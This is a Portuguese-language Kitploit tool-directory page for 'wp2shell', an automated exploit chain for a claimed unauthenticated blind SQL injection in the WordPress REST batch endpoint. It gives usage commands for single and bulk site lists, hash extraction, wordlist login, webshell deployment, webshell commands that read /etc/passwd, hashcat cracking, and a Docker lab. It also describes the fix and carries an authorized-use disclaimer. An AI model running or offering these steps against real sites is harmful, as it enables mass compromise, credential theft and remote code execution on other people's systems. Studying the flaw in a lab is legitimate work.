Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wp2shell — Automated exploit chain for CVE-2026-63030 / CVE-2026-60137 — unauthenticated blind SQLi via WordPress REST batch route-confusion. Dumps user hashes, cracks credentials, deploys webshell. Supports single target and bulk site lists. For authorized security testing only. | Kitploit
Ferramentas/GitHubGitHub/0xwhoknows/wp2shell
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed Teaming
GitHub0xwhoknows/wp2shell

wp2shell

Automated exploit chain for CVE-2026-63030 / CVE-2026-60137 — unauthenticated blind SQLi via WordPress REST batch route-confusion. Dumps user hashes, cracks credentials, deploys webshell. Supports single target and bulk site lists. For authorized security testing only.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

wp2shell

Injeção SQL cega por confusão de rota batch do WordPress REST — cadeia de exploração automatizada.

CVE-2026-63030 / CVE-2026-60137

AfetadoWordPress 6.9.0 – 6.9.4 e 7.0.0 – 7.0.1
CorrigidoWordPress 6.9.5 / 7.0.2
Sinkauthor__not_in SQL via parâmetro author_exclude dessincronizado
Autenticação necessáriaNenhuma (SQLi não autenticada)

Apenas para testes de segurança autorizados.


Como funciona

O endpoint batch da API REST do WordPress (/wp-json/batch/v1) permite requisições batch aninhadas. Um payload de dessincronização duplamente aninhado desloca os arrays internos $matches / $validation, roteando um valor author_exclude manipulado para dentro do SQL author__not_in sem sanitização. Isso concede injeção SQL cega (booleana e baseada em tempo) não autenticada.

Cadeia de exploração — 4 fases:

root@kitploit:~
Fase 1  Verificação de vulnerabilidade     sonda de marcador batch + timing SQL opcional
Fase 2  Colheita de hash                   SQLi cega extrai wp_users (login + hash)
Fase 3  Autenticação                       ataque de wordlist via wp-login.php
Fase 4  Implantação de webshell            upload de plugin ZIP -> verificação de RCE

Requisitos

  • Python 3.8+
  • aiohttp
  • colorama
root@kitploit:~
pip install aiohttp colorama

Uso

Alvo único

root@kitploit:~
python wp2shell.py http://target.com

Lista de sites (uma URL por linha)

root@kitploit:~
python wp2shell.py sites.txt

Lista de sites + arquivo de senha personalizado

root@kitploit:~
python wp2shell.py sites.txt -p pass.txt

Credenciais conhecidas (pular wordlist)

root@kitploit:~
python wp2shell.py http://target.com --user admin --password admin123

Confirmar SQLi com timing

root@kitploit:~
python wp2shell.py http://target.com --confirm-sqli

Sem permalinks amigáveis

root@kitploit:~
python wp2shell.py http://target.com --rest-route

Através de proxy Burp

root@kitploit:~
python wp2shell.py http://target.com --proxy http://127.0.0.1:8080

Opções


Arquivos gerados

ArquivoConteúdo
creds.txthttp://target=>user:pass (texto claro se quebrado, hash se não)
webshell.txtURL da webshell ativa
VULNERABLE.txtTodos os alvos onde a fase 1 confirmou vulnerabilidade

Todos os arquivos são anexados — os resultados acumulam entre execuções.

Usando a webshell — anexe ?cmd=COMMAND à URL em webshell.txt:

root@kitploit:~
# navegador
http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id

# curl
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id"
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=cat+/etc/passwd"

Quebra offline

Se a wordlist não acertar, creds.txt contém o hash extraído:

root@kitploit:~
hashcat -m 400 creds.txt wordlist.txt

Então execute novamente com a senha quebrada:

root@kitploit:~
python wp2shell.py http://target.com --user admin --password <plaintext>

Laboratório local (Docker)

Inicia uma instância vulnerável do WordPress 7.0.1 para testes locais seguros.

Primeira execução — construir volumes e instalar WordPress:

root@kitploit:~
docker compose up -d db wordpress
docker compose run --rm wpcli

Inícios subsequentes:

root@kitploit:~
docker compose up -d db wordpress

Parar:

root@kitploit:~
docker compose down

Reset completo (limpa todos os dados):

root@kitploit:~
docker compose down -v

Executar exploit contra o laboratório:

root@kitploit:~
python wp2shell.py http://localhost:8080

Correção

Atualize para WordPress 6.9.5 ou 7.0.2. A correção valida a rota batch antes de despachar requisições aninhadas, evitando a dessincronização que expõe o sink SQL.


Legal

Para uso em sistemas que você possui ou com autorização explícita por escrito para testar. O uso não autorizado é ilegal.

Baixar ferramenta
OpçãoPadrãoDescrição
target—URL (http://target) ou caminho para arquivo de lista de sites
-p FILE—Arquivo de lista de senhas (uma por linha)
--user—Pular wordlist, usar este nome de usuário
--password—Pular wordlist, usar esta senha
--confirm-sqlidesligadoEnviar sonda de timing SQL ativa após verificação do marcador
--rest-routedesligadoUsar /?rest_route=/batch/v1 (sem permalinks amigáveis)
--sleep N3.0Atraso em segundos do SQL SLEEP()
--samples N3Pares de amostras de timing para cálculo da mediana
--timeout N30.0Tempo limite da requisição HTTP
--prefix PREFIXwp_Prefixo da tabela do banco de dados
--proxy URL—Proxy HTTP/HTTPS
URLhttp://localhost:8080
Adminadmin / admin123
Host MySQLdb
Usuário/senha MySQLwpuser / wppass
Banco de dadoswordpress